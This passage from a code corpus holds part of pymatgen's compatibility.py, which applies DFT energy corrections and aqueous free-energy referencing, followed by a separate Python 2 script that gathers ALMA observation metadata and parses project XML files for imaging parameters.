separate AnionCorrection, GasCorrection, or UCorrection classes which
were used in the legacy correction scheme.
Args:
entry: A ComputedEntry or ComputedStructureEntry object.
Returns:
[EnergyAdjustment]: A list of EnergyAdjustment to be applied to the
Entry.
Raises:
CompatibilityError if the entry is not compatible
"""
if entry.parameters.get("run_type") not in ["GGA", "GGA+U"]:
raise CompatibilityError(
"Entry {} has invalid run type {}. Must be GGA or GGA+U. Discarding.".format(
entry.entry_id, entry.parameters.get("run_type")
)
)
# check the POTCAR symbols
# this should return ufloat(0, 0) or raise a CompatibilityError or ValueError
pc = PotcarCorrection(MPRelaxSet, check_hash=self.check_potcar_hash)
pc.get_correction(entry)
# apply energy adjustments
adjustments: List[CompositionEnergyAdjustment] = []
comp = entry.composition
rform = comp.reduced_formula
# sorted list of elements, ordered by electronegativity
elements = sorted((el for el in comp.elements if comp[el] > 0), key=lambda el: el.X)
# Skip single elements
if len(comp) == 1:
return adjustments
# Check for sulfide corrections
if Element("S") in comp:
sf_type = "sulfide"
if entry.data.get("sulfide_type"):
sf_type = entry.data["sulfide_type"]
elif hasattr(entry, "structure"):
sf_type = sulfide_type(entry.structure)
# use the same correction for polysulfides and sulfides
if sf_type == "polysulfide":
sf_type = "sulfide"
if sf_type == "sulfide":
adjustments.append(
CompositionEnergyAdjustment(
self.comp_correction["S"],
comp["S"],
uncertainty_per_atom=self.comp_errors["S"],
name="MP2020 anion correction (S)",
cls=self.as_dict(),
)
)
# Check for oxide, peroxide, superoxide, and ozonide corrections.
if Element("O") in comp:
if self.correct_peroxide:
# determine the oxide_type
if entry.data.get("oxide_type"):
ox_type = entry.data["oxide_type"]
elif hasattr(entry, "structure"):
ox_type, nbonds = oxide_type(entry.structure, 1.05, return_nbonds=True)
else:
warnings.warn(
"No structure or oxide_type parameter present. Note "
"that peroxide/superoxide corrections are not as "
"reliable and relies only on detection of special"
"formulas, e.g., Li2O2."
)
common_peroxides = [
"Li2O2",
"Na2O2",
"K2O2",
"Cs2O2",
"Rb2O2",
"BeO2",
"MgO2",
"CaO2",
"SrO2",
"BaO2",
]
common_superoxides = ["LiO2", "NaO2", "KO2", "RbO2", "CsO2"]
ozonides = ["LiO3", "NaO3", "KO3", "NaO5"]
if rform in common_peroxides:
ox_type = "peroxide"
elif rform in common_superoxides:
ox_type = "superoxide"
elif rform in ozonides:
ox_type = "ozonide"
else:
ox_type = "oxide"
else:
ox_type = "oxide"
if ox_type == "hydroxide":
ox_type = "oxide"
adjustments.append(
CompositionEnergyAdjustment(
self.comp_correction[ox_type],
comp["O"],
uncertainty_per_atom=self.comp_errors[ox_type],
name=f"MP2020 anion correction ({ox_type})",
cls=self.as_dict(),
)
)
# Check for anion corrections
# only apply anion corrections if the element is an anion
# first check for a pre-populated oxidation states key
# the key is expected to comprise a dict corresponding to the first element output by
# Composition.oxi_state_guesses(), e.g. {'Al': 3.0, 'S': 2.0, 'O': -2.0} for 'Al2SO4'
if "oxidation_states" not in entry.data.keys():
# try to guess the oxidation states from composition
# for performance reasons, fail if the composition is too large
try:
oxi_states = entry.composition.oxi_state_guesses(max_sites=-20)
except ValueError:
oxi_states = []
if oxi_states == []:
entry.data["oxidation_states"] = {}
else:
entry.data["oxidation_states"] = oxi_states[0]
if entry.data["oxidation_states"] == {}:
warnings.warn(
f"Failed to guess oxidation states for Entry {entry.entry_id} "
f"({entry.composition.reduced_formula}). Assigning anion correction to "
"only the most electronegative atom."
)
for anion in ["Br", "I", "Se", "Si", "Sb", "Te", "H", "N", "F", "Cl"]:
if Element(anion) in comp and anion in self.comp_correction:
apply_correction = False
# if the oxidation_states key is not populated, only apply the correction if the anion
# is the most electronegative element
if entry.data["oxidation_states"].get(anion, 0) < 0:
apply_correction = True
else:
most_electroneg = elements[-1].symbol
if anion == most_electroneg:
apply_correction = True
if apply_correction:
adjustments.append(
CompositionEnergyAdjustment(
self.comp_correction[anion],
comp[anion],
uncertainty_per_atom=self.comp_errors[anion],
name=f"MP2020 anion correction ({anion})",
cls=self.as_dict(),
)
)
# GGA / GGA+U mixing scheme corrections
calc_u = entry.parameters.get("hubbards", None)
calc_u = defaultdict(int) if calc_u is None else calc_u
most_electroneg = elements[-1].symbol
ucorr = self.u_corrections.get(most_electroneg, defaultdict(float))
usettings = self.u_settings.get(most_electroneg, defaultdict(float))
uerrors = self.u_errors.get(most_electroneg, defaultdict(float))
for el in comp.elements:
sym = el.symbol
# Check for bad U values
if calc_u.get(sym, 0) != usettings.get(sym, 0):
raise CompatibilityError(f"Invalid U value of {calc_u.get(sym, 0):.1f} on {sym}")
if sym in ucorr:
adjustments.append(
CompositionEnergyAdjustment(
ucorr[sym],
comp[el],
uncertainty_per_atom=uerrors[sym],
name=f"MP2020 GGA/GGA+U mixing correction ({sym})",
cls=self.as_dict(),
)
)
return adjustments
class MITCompatibility(CorrectionsList):
"""
This class implements the GGA/GGA+U mixing scheme, which allows mixing of
entries. Note that this should only be used for VASP calculations using the
MIT parameters (see pymatgen.io.vaspio_set MITVaspInputSet). Using
this compatibility scheme on runs with different parameters is not valid.
"""
def __init__(self, compat_type="Advanced", correct_peroxide=True, check_potcar_hash=False):
"""
Args:
compat_type: Two options, GGA or Advanced. GGA means all GGA+U
entries are excluded. Advanced means mixing scheme is
implemented to make entries compatible with each other,
but entries which are supposed to be done in GGA+U will have the
equivalent GGA entries excluded. For example, Fe oxides should
have a U value under the Advanced scheme. A GGA Fe oxide run
will therefore be excluded under the scheme.
correct_peroxide: Specify whether peroxide/superoxide/ozonide
corrections are to be applied or not.
check_potcar_hash (bool): Use potcar hash to verify potcars are correct.
"""
self.compat_type = compat_type
self.correct_peroxide = correct_peroxide
self.check_potcar_hash = check_potcar_hash
fp = os.path.join(MODULE_DIR, "MITCompatibility.yaml")
super().__init__(
[
PotcarCorrection(MITRelaxSet, check_hash=check_potcar_hash),
GasCorrection(fp),
AnionCorrection(fp, correct_peroxide=correct_peroxide),
UCorrection(fp, MITRelaxSet, compat_type),
]
)
class MITAqueousCompatibility(CorrectionsList):
"""
This class implements the GGA/GGA+U mixing scheme, which allows mixing of
entries. Note that this should only be used for VASP calculations using the
MIT parameters (see pymatgen.io.vaspio_set MITVaspInputSet). Using
this compatibility scheme on runs with different parameters is not valid.
"""
def __init__(self, compat_type="Advanced", correct_peroxide=True, check_potcar_hash=False):
"""
Args:
compat_type: Two options, GGA or Advanced. GGA means all GGA+U
entries are excluded. Advanced means mixing scheme is
implemented to make entries compatible with each other,
but entries which are supposed to be done in GGA+U will have the
equivalent GGA entries excluded. For example, Fe oxides should
have a U value under the Advanced scheme. A GGA Fe oxide run
will therefore be excluded under the scheme.
correct_peroxide: Specify whether peroxide/superoxide/ozonide
corrections are to be applied or not.
check_potcar_hash (bool): Use potcar hash to verify potcars are correct.
"""
self.compat_type = compat_type
self.correct_peroxide = correct_peroxide
self.check_potcar_hash = check_potcar_hash
fp = os.path.join(MODULE_DIR, "MITCompatibility.yaml")
super().__init__(
[
PotcarCorrection(MITRelaxSet, check_hash=check_potcar_hash),
GasCorrection(fp),
AnionCorrection(fp, correct_peroxide=correct_peroxide),
UCorrection(fp, MITRelaxSet, compat_type),
AqueousCorrection(fp),
]
)
@cached_class
class MaterialsProjectAqueousCompatibility(Compatibility):
"""
This class implements the Aqueous energy referencing scheme for constructing
Pourbaix diagrams from DFT energies, as described in Persson et al.
This scheme applies various energy adjustments to convert DFT energies into
Gibbs free energies of formation at 298 K and to guarantee that the experimental
formation free energy of H2O is reproduced. Briefly, the steps are:
1. Beginning with the DFT energy of O2, adjust the energy of H2 so that
the experimental reaction energy of -2.458 eV/H2O is reproduced.
2. Add entropy to the DFT energy of any compounds that are liquid or
gaseous at room temperature
3. Adjust the DFT energies of solid hydrate compounds (compounds that
contain water, e.g. FeO.nH2O) such that the energies of the embedded
H2O molecules are equal to the experimental free energy
The above energy adjustments are computed dynamically based on the input
Entries.
References:
K.A. Persson, B. Waldwick, P. Lazic, G. Ceder, Prediction of solid-aqueous
equilibria: Scheme to combine first-principles calculations of solids with
experimental aqueous states, Phys. Rev. B - Condens. Matter Mater. Phys.
85 (2012) 1–12. doi:10.1103/PhysRevB.85.235438.
"""
def __init__(
self,
solid_compat: Optional[Union[Compatibility, Type[Compatibility]]] = MaterialsProject2020Compatibility,
o2_energy: Optional[float] = None,
h2o_energy: Optional[float] = None,
h2o_adjustments: Optional[float] = None,
):
"""
Initialize the MaterialsProjectAqueousCompatibility class.
Note that this class requires as inputs the ground-state DFT energies of O2 and H2O, plus the value of any
energy adjustments applied to an H2O molecule. If these parameters are not provided in __init__, they can
be automatically populated by including ComputedEntry for the ground state of O2 and H2O in a list of
entries passed to process_entries. process_entries will fail if one or the other is not provided.
Args:
solid_compat: Compatibility scheme used to pre-process solid DFT energies prior to applying aqueous
energy adjustments. May be passed as a class (e.g. MaterialsProject2020Compatibility) or an instance
(e.g., MaterialsProject2020Compatibility()). If None, solid DFT energies are used as-is.
Default: MaterialsProject2020Compatibility
o2_energy: The ground-state DFT energy of oxygen gas, including any adjustments or corrections, in eV/atom.
If not set, this value will be determined from any O2 entries passed to process_entries.
Default: None
h2o_energy: The ground-state DFT energy of water, including any adjstments or corrections, in eV/atom.
If not set, this value will be determined from any H2O entries passed to process_entries.
Default: None
h2o_adjustments: Total energy adjustments applied to one water molecule, in eV/atom.
If not set, this value will be determined from any H2O entries passed to process_entries.
Default: None
"""
self.solid_compat = None
# check whether solid_compat has been instantiated
if solid_compat is None:
self.solid_compat = None
elif isinstance(solid_compat, type) and issubclass(solid_compat, Compatibility):
self.solid_compat = solid_compat()
elif issubclass(type(solid_compat), Compatibility):
self.solid_compat = solid_compat
else:
raise ValueError("Expected a Compatibility class, instance of a Compatibility or None")
self.o2_energy = o2_energy
self.h2o_energy = h2o_energy
self.h2_energy = None
self.h2o_adjustments = h2o_adjustments
if not all([self.o2_energy, self.h2o_energy, self.h2o_adjustments]):
warnings.warn(
"You did not provide the required O2 and H2O energies. {} "
"needs these energies in order to compute the appropriate energy adjustments. It will try "
"to determine the values from ComputedEntry for O2 and H2O passed to process_entries, but "
"will fail if these entries are not provided.".format(type(self).__name__)
)
# Standard state entropy of molecular-like compounds at 298K (-T delta S)
# from Kubaschewski Tables (eV/atom)
self.cpd_entropies = {
"O2": 0.316731,
"N2": 0.295729,
"F2": 0.313025,
"Cl2": 0.344373,
"Br": 0.235039,
"Hg": 0.234421,
"H2O": 0.071963, # 0.215891 eV/H2O
}
self.name = "MP Aqueous free energy adjustment"
super().__init__()
def get_adjustments(self, entry):
"""
Returns the corrections applied to a particular entry.
Args:
entry: A ComputedEntry object.
Returns:
[EnergyAdjustment]: Energy adjustments to be applied to entry.
Raises:
CompatibilityError if the required O2 and H2O energies have not been provided to
MaterialsProjectAqueousCompatibility during init or in the list of entries passed to process_entries.
"""
adjustments = []
if self.o2_energy is None or self.h2o_energy is None or self.h2o_adjustments is None:
raise CompatibilityError(
"You did not provide the required O2 and H2O energies. "
"{} needs these energies in order to compute "
"the appropriate energy adjustments. Either specify the energies as arguments "
"to {}.__init__ or run process_entries on a list that includes ComputedEntry for "
"the ground state of O2 and H2O.".format(type(self).__name__, type(self).__name__)
)
# compute the free energies of H2 and H2O (eV/atom) to guarantee that the
# formationfree energy of H2O is equal to -2.4583 eV/H2O from experiments
# (MU_H2O from Pourbaix module)
# Free energy of H2 in eV/atom, fitted using Eq. 40 of Persson et al. PRB 2012 85(23)
# for this calculation ONLY, we need the (corrected) DFT energy of water
self.fit_h2_energy = round(
0.5
* (
3 * (self.h2o_energy - self.cpd_entropies["H2O"]) - (self.o2_energy - self.cpd_entropies["O2"]) - MU_H2O
),
6,
)
comp = entry.composition
rform = comp.reduced_formula
# use fit_h2_energy to adjust the energy of all H2 polymorphs such that
# the lowest energy polymorph has the correct experimental value
# if h2o and o2 energies have been set explicitly via kwargs, then
# all H2 polymorphs will get the same energy.
if rform == "H2":
adjustments.append(
ConstantEnergyAdjustment(
(self.fit_h2_energy - self.h2_energy) * comp.num_atoms,
uncertainty=np.nan,
name="MP Aqueous H2 / H2O referencing",
cls=self.as_dict(),
description="Adjusts the H2 energy to reproduce the experimental "
"Gibbs formation free energy of H2O, based on the DFT energy "
"of Oxygen and H2O",
)
)
# add minus T delta S to the DFT energy (enthalpy) of compounds that are
# molecular-like at room temperature
if rform in self.cpd_entropies:
adjustments.append(
TemperatureEnergyAdjustment(
-1 * self.cpd_entropies[rform] / 298,
298,
comp.num_atoms,
uncertainty_per_deg=np.nan,
name="Compound entropy at room temperature",
cls=self.as_dict(),
description="Adds the entropy (T delta S) to energies of compounds that "
"are gaseous or liquid at standard state",
)
)
# TODO - detection of embedded water molecules is not very sophisticated
# Should be replaced with some kind of actual structure detection
# For any compound except water, check to see if it is a hydrate (contains)
# H2O in its structure. If so, adjust the energy to remove MU_H2O ev per
# embedded water molecule.
# in other words, we assume that the DFT energy of such a compound is really
# a superposition of the "real" solid DFT energy (FeO in this case) and the free
# energy of some water molecules
# e.g. that E_FeO.nH2O = E_FeO + n * g_H2O
# so, to get the most accurate gibbs free energy, we want to replace
# g_FeO.nH2O = E_FeO.nH2O + dE_Fe + (n+1) * dE_O + 2n dE_H
# with
# g_FeO = E_FeO.nH2O + dE_Fe + dE_O + n g_H2O
# where E is DFT energy, dE is an energy correction, and g is gibbs free energy
# This means we have to 1) remove energy corrections associated with H and O in water
# and then 2) remove the free energy of the water molecules
if not rform == "H2O":
# count the number of whole water molecules in the composition
nH2O = int(min(comp["H"] / 2.0, comp["O"]))
if nH2O > 0:
# first, remove any H or O corrections already applied to H2O in the
# formation energy so that we don't double count them
# next, remove MU_H2O for each water molecule present
hydrate_adjustment = -1 * (self.h2o_adjustments * 3 + MU_H2O)
adjustments.append(
CompositionEnergyAdjustment(
hydrate_adjustment,
nH2O,
uncertainty_per_atom=np.nan,
name="MP Aqueous hydrate",
cls=self.as_dict(),
description="Adjust the energy of solid hydrate compounds (compounds "
"containing H2O molecules in their structure) so that the "
"free energies of embedded H2O molecules match the experimental"
" value enforced by the MP Aqueous energy referencing scheme.",
)
)
return adjustments
def process_entries(
self, entries: Union[ComputedEntry, List[ComputedEntry]], clean: bool = False, verbose: bool = False
):
"""
Process a sequence of entries with the chosen Compatibility scheme.
Args:
entries: ComputedEntry or [ComputedEntry]
clean: bool, whether to remove any previously-applied energy adjustments.
If True, all EnergyAdjustment are removed prior to processing the Entry.
Default is False.
verbose: bool, whether to display progress bar for processing multiple entries.
Default is False.
Returns:
A list of adjusted entries. Entries in the original list which
are not compatible are excluded.
"""
# convert input arg to a list if not already
if isinstance(entries, ComputedEntry):
entries = [entries]
# pre-process entries with the given solid compatibility class
if self.solid_compat:
entries = self.solid_compat.process_entries(entries, clean=True)
# when processing single entries, all H2 polymorphs will get assigned the
# same energy
if len(entries) == 1 and entries[0].composition.reduced_formula == "H2":
warnings.warn(
"Processing single H2 entries will result in the all polymorphs "
"being assigned the same energy. This should not cause problems "
"with Pourbaix diagram construction, but may be confusing. "
"Pass all entries to process_entries() at once in if you want to "
"preserve H2 polymorph energy differences."
)
# extract the DFT energies of oxygen and water from the list of entries, if present
# do not do this when processing a single entry, as it might lead to unintended
# results
if len(entries) > 1:
if not self.o2_energy:
o2_entries = [e for e in entries if e.composition.reduced_formula == "O2"]
if o2_entries:
self.o2_energy = min(e.energy_per_atom for e in o2_entries)
if not self.h2o_energy and not self.h2o_adjustments:
h2o_entries = [e for e in entries if e.composition.reduced_formula == "H2O"]
if h2o_entries:
h2o_entries = sorted(h2o_entries, key=lambda e: e.energy_per_atom)
self.h2o_energy = h2o_entries[0].energy_per_atom
self.h2o_adjustments = h2o_entries[0].correction / h2o_entries[0].composition.num_atoms
h2_entries = [e for e in entries if e.composition.reduced_formula == "H2"]
if h2_entries:
h2_entries = sorted(h2_entries, key=lambda e: e.energy_per_atom)
self.h2_energy = h2_entries[0].energy_per_atom # type: ignore
return super().process_entries(entries, clean=clean, verbose=verbose)
|
materialsproject/pymatgen
|
pymatgen/entries/compatibility.py
|
Python
|
mit
| 61,576
|
[
"VASP",
"pymatgen"
] |
cb62c13952932217f4b288c72b74708c6322a218f5f689f0286f5ebd9230b424
|
# Author: Brian Kirk
# --------------------------------------------------------------------------------------------------
def ReadDataFromWeb(dataurl,dataurl2, mous_code):
# --------------------------------------------------------------------------------------------------
"""
This function reads the text file from the given url and creates a dictionary
"""
import urllib2
print "Gathering metadata..."
response = urllib2.urlopen(dataurl)
html = response.read().splitlines()
response = None
datadict = {'mous':mous_code}
mousid = mous_code
mousid2=mousid.replace("___","://").replace("_","/")
for line in html:
line=line.split()
#print line[0],line[1],line[2],line[3],line[4]
if line[4]==mousid:
#print "found MOUS"
#print line[0]
datadict['code']=line[0]
datadict['sgous']=line[2]
datadict['gous']=line[3]
datadict['mous']= line[4]
if datadict.has_key('sbuids'):
datadict['sbuids'].append(line[9])
else:
datadict['sbuids']=[line[9]]
if datadict.has_key('sbnames'):
datadict['sbnames'].append(line[10])
else:
datadict['sbnames']=[line[10]]
response2 = urllib2.urlopen(dataurl2)
html2 = response2.read().splitlines()
response2 = None
for line2 in html2:
line2=line2.split("|")
if line2[2]=='SemiPass':
continue
if line2[0]==mousid2:
if datadict.has_key('ebuids'):
datadict['ebuids'].append(line2[1])
else:
datadict['ebuids']=[line2[1]]
# We want to uniquify the SB names (and the EB names although there should nothing to be done there
datadict['sbnames'] = list(set(datadict['sbnames']))
datadict['sbuids'] = list(set(datadict['sbuids']))
datadict['ebuids'] = list(set(datadict['ebuids']))
gousstr = datadict['gous'].replace("___","://").replace("_","/")
mousstr = datadict['mous'].replace("___","://").replace("_","/")
if len(datadict['sbnames'])==1:
sbnamestr=" "+datadict['sbnames'][0].replace('"','')
else:
sbnamestr="s "+",".join(datadict['sbnames'][0:-1])+" and "+datadict['sbnames'][-1]
if len(datadict['sbuids'])==1:
sbuidstr=" "+datadict['sbuids'][0].replace("___","://").replace("_","/")
else:
sbuidstr="s "+",".join(datadict['sbuids'][0:-1])+" and "+datadict['sbuids'][-1]
if len(datadict['ebuids'])==1:
ebuidstr=" "+datadict['ebuids'][0].replace("___","://").replace("_","/")
else:
ebuidstr=" "+",".join(datadict['ebuids'][0:-1]).replace("___","://").replace("_","/")+" and "+datadict['ebuids'][-1].replace("___","://").replace("_","/")
print "Gathering metadata done"
return datadict
# --------------------------------------------------------------------------------------------------
def SetXMLFiles(datadict, user_name, path_aot, name_aot):
# --------------------------------------------------------------------------------------------------
import zipfile #allows unpacking of the .aot zipfile
import os
print "Initializing XML databases..."
#Getting some basic information to start:
mous_code = datadict['mous']
SB_name = str(datadict['sbnames'][0]).strip('\"')
#Unpacking .aot zipfile to access the XML files to collect necessary information for the data-staging (XML for imaging & README later)
os.chdir(path_aot)
os.system('mkdir %s_FILES' % name_aot)
zf = zipfile.ZipFile(name_aot)
zf.extractall('%s_FILES' % name_aot)
#Parsing the XML databases into a python readable format
import xml.etree.ElementTree as ET #this is for accessing the XML datasets
project_tree = ET.parse('%s/%s_FILES/ObsProject.xml' % (path_aot, name_aot))
project_root = project_tree.getroot()
proposal_tree = ET.parse('%s/%s_FILES/ObsProposal.xml' % (path_aot, name_aot))
proposal_root = proposal_tree.getroot()
attachment_tree = ET.parse('%s/%s_FILES/ObsAttachment.xml' % (path_aot, name_aot)) #only has info about the .aot package
attachment_root = attachment_tree.getroot()
#Loading namespaces from XML files (single/double quotes matter!):
xmlns = {
"ent":"Alma/CommonEntity",
"val":"Alma/ValueTypes",
"prp":"Alma/ObsPrep/ObsProposal",
"orv":"Alma/ObsPrep/ObsReview",
"ps":"Alma/ObsPrep/ProjectStatus",
"oat":"Alma/ObsPrep/ObsAttachment",
"prj":"Alma/ObsPrep/ObsProject",
"sbl":"Alma/ObsPrep/SchedBlock",
"xsi":"http://www.w3.org/2001/XMLSchema-instance"
}
print 'Initializing XML databases complete.'
return project_root, proposal_root, xmlns
# --------------------------------------------------------------------------------------------------
def HarvestXMLLine (project_root, proposal_root, xmlns, SB_name, path_aot, name_aot):
# --------------------------------------------------------------------------------------------------
'''
Harvesting the XML files for useful information about the project and README
'''
print'Harvesting XML files for data...'
import glob
import os
import xml.etree.ElementTree as ET #this is for accessing the XML datasets
# ----------------------------------------
#Getting the project number from the ObsProject.xml dataset
XML_dict = {}
XML_dict['project_number'] = project_root.find("prj:code", xmlns).text
# ----------------------------------------
# ----------------------------------------
#Determining which SchedBlock XML file to use from the project based on the SB name provided by the user
os.chdir('%s/%s_FILES' % (path_aot, name_aot))
schedblock_files = glob.glob('SchedBlock*.xml') #getting all XML files
for sblock in schedblock_files:
if SB_name in open(sblock).read():
#schedblock_name = sblock #this is only used in debugging if I need to know which sblock file quickly
schedblock_tree = ET.parse('%s/%s_FILES/%s' % (path_aot, name_aot, sblock))
schedblock_root = schedblock_tree.getroot() #see above note
# ----------------------------------------
# ----------------------------------------
#Scraping the XML files for the required information for the imaging script & README
XML_dict['projectName'] = project_root.find("prj:projectName", xmlns).text
XML_dict['pI'] = project_root.find("prj:pI", xmlns).text
XML_dict['project_version'] = project_root.find("prj:version", xmlns).text
XML_dict['projectCode'] = project_root.find("prj:code", xmlns).text
#XML_dict['pointing_accruacy'] = schedblock_root.find("./prj:ObsUnitControl/prj:CalibrationRequirements/prj:pointingAccuracy", xmlns).text
XML_dict['angular_resolution'] = project_root.find("./prj:ObsProgram/prj:ScienceGoal/prj:PerformanceParameters/prj:desiredAngularResolution", xmlns).text
# ----------------------------------------
# ----------------------------------------
#Cycle number (determined by year of observation)
XML_dict['cycle'] = proposal_root.find("prp:cycle", xmlns).text #ex: 2015.1
if '2015' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 3"
if '2014' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 2"
if '2013' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 2"
if '2012' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 1"
# ----------------------------------------
# ----------------------------------------
#I need to determine what the science target is (can't always be done through /sbl:name or /sbl:sourceName).
#What I do is find the /sbl:name that has "Primary" and record the index number of which child node it is
#I record index number with the i-iterator.
#I use that index number to search the /sbl:FieldSource and determine the unique entityPartId number.
#Since that number is unique I've secured a way to locate all relevant information about the science target.
i=1
for child in schedblock_root.findall("./sbl:FieldSource/sbl:name",xmlns):
if "Primary" in child.text:
primary_index = i
i=i+1
#I need to create a string that codes in the index value since XPath doesn't take variables. This will have to be done for each item that is located using the entityPartId since it's located in a variable.
entityPartId_string = "./sbl:FieldSource[%i]" % primary_index
XML_dict['entityPartId'] = schedblock_root.find(entityPartId_string, xmlns).attrib.get('entityPartId')
#Now I can use XPath and the unique entityPartId to garuntee correct results
# ----------------------------------------
# ----------------------------------------
#Source name
source_string = "./sbl:FieldSource[@entityPartId='%s']/sbl:sourceName" % XML_dict['entityPartId']
XML_dict['source_name'] = schedblock_root.find(source_string, xmlns).text
# ----------------------------------------
# ----------------------------------------
#Reference system
reference_string = "./sbl:FieldSource[@entityPartId='%s']/sbl:sourceVelocity" % XML_dict['entityPartId']
XML_dict['outframe'] = schedblock_root.find(reference_string, xmlns).attrib.get('referenceSystem')
# ----------------------------------------
# ----------------------------------------
#Requested rms
for child in schedblock_root.findall("./sbl:ScienceParameters/sbl:sensitivityGoal", xmlns):
rms_value = child.text #sensitivity may not be rms
rms_unit = child.attrib.get('unit')
XML_dict['sensitivity'] = rms_value + rms_unit
# ----------------------------------------
# ----------------------------------------
#Determining if the bandwidth used for sensitivity is in frequency or velocity space
repBandwidth = schedblock_root.find("./sbl:ScienceParameters/sbl:representativeBandwidth", xmlns).text
repBandwidthUnit = schedblock_root.find("./sbl:ScienceParameters/sbl:representativeBandwidth", xmlns).attrib
if 'Hz' in repBandwidthUnit['unit']:
XML_dict['clean_mode'] = 'frequency'
else:
XML_dict['clean_mode'] = 'velocity'
# ----------------------------------------
# ----------------------------------------
#Determining continuum width and line frequency:
XML_dict['width'] = repBandwidth + repBandwidthUnit.get('unit') #this is to put it in proper form for the imaging script
XML_dict['skyFrequency'] = schedblock_root.find("./sbl:ScienceParameters/sbl:representativeFrequency", xmlns).text
XML_dict['restFrequency'] = schedblock_root.find("./sbl:SpectralSpec/sbl:BLCorrelatorConfiguration/sbl:BLBaseBandConfig/sbl:BLSpectralWindow/sbl:SpectralLine/sbl:restFrequency",xmlns).text
#Now converting the bandwidth for sensitivity to velocity space instead of frequency space
if 'MHz' in repBandwidthUnit['unit']:
XML_dict['repBandwidthGHz'] = float(repBandwidth) * 0.001
XML_dict['repBandwidthKMs'] = round((XML_dict['repBandwidthGHz'] / float(XML_dict['restFrequency'])) * 300000, 3) # speed of light in km/s; the other 3 tells round the number of significant digits to round to. I set 3 bc that matches the MHz conversion.
if 'GHz' in repBandwidthUnit['unit']:
XML_dict['repBandwidthGHz'] = float(repBandwidth)
XML_dict['repBandwidthKMs'] = round((XML_dict['repBandwidthGHz'] / float(XML_dict['restFrequency'])) * 300000, 3)
# ----------------------------------------
# ----------------------------------------
#Transition name:
for child in schedblock_root.findall("./sbl:SpectralSpec/sbl:FrequencySetup/sbl:transitionName", xmlns):
if child.text != 'pointing':
XML_dict['transition_name'] = child.text
# ----------------------------------------
# ----------------------------------------
#Start velocity
for child in proposal_root.findall("./prj:ScienceGoal/prj:TargetParameters/prj:sourceName", xmlns):
if child.text == '%s' % XML_dict['source_name']: #the start velocity is determined by the source target, so you need that first
XML_dict['velocity'] = proposal_root.find("./prj:ScienceGoal/prj:TargetParameters/prj:sourceVelocity/val:centerVelocity", xmlns).text
# ----------------------------------------
# ----------------------------------------
#Expected Line Width (to determine nchan): what happens if continuum project?
for child in proposal_root.findall("./prj:ScienceGoal/prj:TargetParameters/prj:sourceName", xmlns):
if child.text == '%s' % XML_dict['source_name']:
line_width_unit = proposal_root.find("./prj:ScienceGoal/prj:TargetParameters/prj:ExpectedProperties/prj:expectedLineWidth", xmlns).attrib
XML_dict['line_width'] = proposal_root.find("./prj:ScienceGoal/prj:TargetParameters/prj:ExpectedProperties/prj:expectedLineWidth", xmlns).text
XML_dict['line_width_kms'] = round(float(XML_dict['line_width']) / float(XML_dict['restFrequency']) * 300000)
# ----------------------------------------
# ----------------------------------------
#...now determinine the line cube properties with additional emission free channels: it's prefered to have a factor of 5x the line width surrounding the line in the cube
if float(XML_dict['velocity']) < 0:
XML_dict['cube_start'] = float(XML_dict['line_width_kms']) * 5.0 *-1 + float(XML_dict['velocity'])
else:
XML_dict['cube_start'] = float(XML_dict['line_width_kms']) * 5.0 - float(XML_dict['velocity'])
XML_dict['cube_end'] = float(XML_dict['line_width_kms']) * 5.0 + float(XML_dict['velocity'])
XML_dict['cube_size'] = abs(XML_dict['cube_start'] - XML_dict['cube_end'])
XML_dict['nchan'] = round(XML_dict['cube_size'] / float(XML_dict['repBandwidthKMs']))
# ----------------------------------------
# ----------------------------------------
#Imagermode: csclean or mosaic mode?
imagermode_string = "./sbl:FieldSource[@entityPartId='%s']/sbl:PointingPattern/sbl:isMosaic" % XML_dict['entityPartId']
imagermode_boolean = schedblock_root.find(imagermode_string, xmlns).text
if imagermode_boolean == 'false':
XML_dict['imagermode'] = 'csclean'
else:
XML_dict['imagermode'] = 'mosaic'
# ----------------------------------------
# ----------------------------------------
#SPW information from SchedBlock files
#I have to use the indexing because I can't specify the sbl:name attribute until I know what it is - so I look for "Science" then get the index,
index=1 # Note that a node's position in a context is not zero-based. The first node has a position of 1.
for SpectralSpec in schedblock_root.findall("./sbl:SpectralSpec/sbl:name", xmlns):
if 'Science' in SpectralSpec.text:
sbl_name = SpectralSpec.text
science_setup_index = index
index = index + 1
#...then real name, then that SpectralSpec (using the index) for right spw info
spw_channel_list_string = "./sbl:SpectralSpec/[%i]/sbl:BLCorrelatorConfiguration/sbl:BLBaseBandConfig/sbl:BLSpectralWindow/sbl:effectiveNumberOfChannels" % science_setup_index
spw_channel_list = schedblock_root.findall(spw_channel_list_string, xmlns)
spw_channels = []
for spw in spw_channel_list:
spw_channels.append(spw.text) #continuum will be low # of channels, lines will have high # of channels
XML_dict['spw_channels'] = spw_channels
#...then getting the averaging used on each SPW
spw_avg_list_string = "./sbl:SpectralSpec/[%i]/sbl:BLCorrelatorConfiguration/sbl:BLBaseBandConfig/sbl:BLSpectralWindow/sbl:spectralAveragingFactor" % science_setup_index
spw_avg_list = schedblock_root.findall(spw_avg_list_string, xmlns)
spw_averaging= []
for spw in spw_avg_list:
spw_averaging.append(spw.text)
XML_dict['spw_averaging'] = spw_averaging
#...then determining the final number of channels after averaging
width_after_averaging = []
for i in range(0,len(spw_channels)):
post_average = int(spw_channels[i]) / int(spw_averaging[i])
width_after_averaging.append(post_average)
XML_dict['width_after_averaging'] = width_after_averaging
# ----------------------------------------
print'Harvesting XML files complete'
return XML_dict
# --------------------------------------------------------------------------------------------------
def HarvestXMLContinuum (project_root, proposal_root, xmlns, SB_name, path_aot, name_aot):
# --------------------------------------------------------------------------------------------------
'''
Harvesting the XML files for useful information about the project and README
'''
print'Harvesting XML files for data...'
import glob
import os
import xml.etree.ElementTree as ET #this is for accessing the XML datasets
# ----------------------------------------
#Getting the project number from the ObsProject.xml dataset
XML_dict = {}
XML_dict['project_number'] = project_root.find("prj:code", xmlns).text
# ----------------------------------------
# ----------------------------------------
#Determining which SchedBlock XML file to use from the project based on the SB name provided by the user
os.chdir('%s/%s_FILES' % (path_aot, name_aot))
schedblock_files = glob.glob('SchedBlock*.xml') #getting all XML files
for sblock in schedblock_files:
if SB_name in open(sblock).read():
#schedblock_name = sblock #this is only used in debugging if I need to know which sblock file quickly
schedblock_tree = ET.parse('%s/%s_FILES/%s' % (path_aot, name_aot, sblock))
schedblock_root = schedblock_tree.getroot() #see above note
# ----------------------------------------
